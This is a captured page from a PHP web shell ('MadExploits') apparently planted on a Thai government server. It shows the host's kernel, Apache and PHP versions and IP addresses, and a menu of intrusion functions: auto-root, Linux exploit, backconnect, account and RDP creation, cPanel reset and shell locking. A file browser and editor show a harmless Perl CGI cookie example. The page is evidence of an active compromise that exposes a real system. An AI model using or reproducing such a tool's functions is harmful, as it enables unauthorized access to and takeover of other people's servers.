Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
CGI /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
WORLD_WRITABLE
[ DIR ]
drwxr-xr-x
caution.xbm
741
B
-rw-r--r--
clickable_image.cgi
808
B
-rw-r--r--
cookie.cgi
2.21
KB
-rw-r--r--
crash.cgi
131
B
-rw-r--r--
customize.cgi
2.4
KB
-rw-r--r--
diff_upload.cgi
1.56
KB
-rw-r--r--
file_upload.cgi
1.95
KB
-rw-r--r--
frameset.cgi
2.03
KB
-rw-r--r--
index.html
3.41
KB
-rw-r--r--
internal_links.cgi
1019
B
-rw-r--r--
javascript.cgi
2.98
KB
-rw-r--r--
make_links.pl
196
B
-rw-r--r--
monty.cgi
2.04
KB
-rw-r--r--
multiple_forms.cgi
1.56
KB
-rw-r--r--
nph-clock.cgi
359
B
-rw-r--r--
nph-multipart.cgi
263
B
-rw-r--r--
popup.cgi
1
KB
-rw-r--r--
save_state.cgi
2.26
KB
-rw-r--r--
tryit.cgi
780
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cookie.cgi
#!/usr/local/bin/perl use CGI qw(:standard); @ANIMALS=sort qw/lion tiger bear pig porcupine ferret zebra gnu ostrich emu moa goat weasel yak chicken sheep hyena dodo lounge-lizard squirrel rat mouse hedgehog racoon baboon kangaroo hippopotamus giraffe/; # Recover the previous animals from the magic cookie. # The cookie has been formatted as an associative array # mapping animal name to the number of animals. %zoo = cookie('animals'); # Recover the new animal(s) from the parameter 'new_animal' @new = param('new_animals'); # If the action is 'add', then add new animals to the zoo. Otherwise # delete them. foreach (@new) { if (param('action') eq 'Add') { $zoo{$_}++; } elsif (param('action') eq 'Delete') { $zoo{$_}-- if $zoo{$_}; delete $zoo{$_} unless $zoo{$_}; } } # Add new animals to old, and put them in a cookie $the_cookie = cookie(-name=>'animals', -value=>\%zoo, -expires=>'+1h'); # Print the header, incorporating the cookie and the expiration date... print header(-cookie=>$the_cookie); # Now we're ready to create our HTML page. print start_html('Animal crackers'); print <<EOF; <h1>Animal Crackers</h1> Choose the animals you want to add to the zoo, and click "add". Come back to this page any time within the next hour and the list of animals in the zoo will be resurrected. You can even quit Netscape completely! <p> Try adding the same animal several times to the list. Does this remind you vaguely of a shopping cart? <p> <em>This script only works with Netscape browsers</em> <p> <center> <table border> <tr><th>Add/Delete<th>Current Contents EOF ; print "<tr><td>",start_form; print scrolling_list(-name=>'new_animals', -values=>[@ANIMALS], -multiple=>1, -override=>1, -size=>10),"<br>"; print submit(-name=>'action',-value=>'Delete'), submit(-name=>'action',-value=>'Add'); print end_form; print "<td>"; if (%zoo) { # make a table print "<ul>\n"; foreach (sort keys %zoo) { print "<li>$zoo{$_} $_\n"; } print "</ul>\n"; } else { print "<strong>The zoo is empty.</strong>\n"; } print "</table></center>"; print <<EOF; <hr> <ADDRESS>Lincoln D. Stein</ADDRESS><BR> <A HREF="./">More Examples</A> EOF ; print end_html;
Close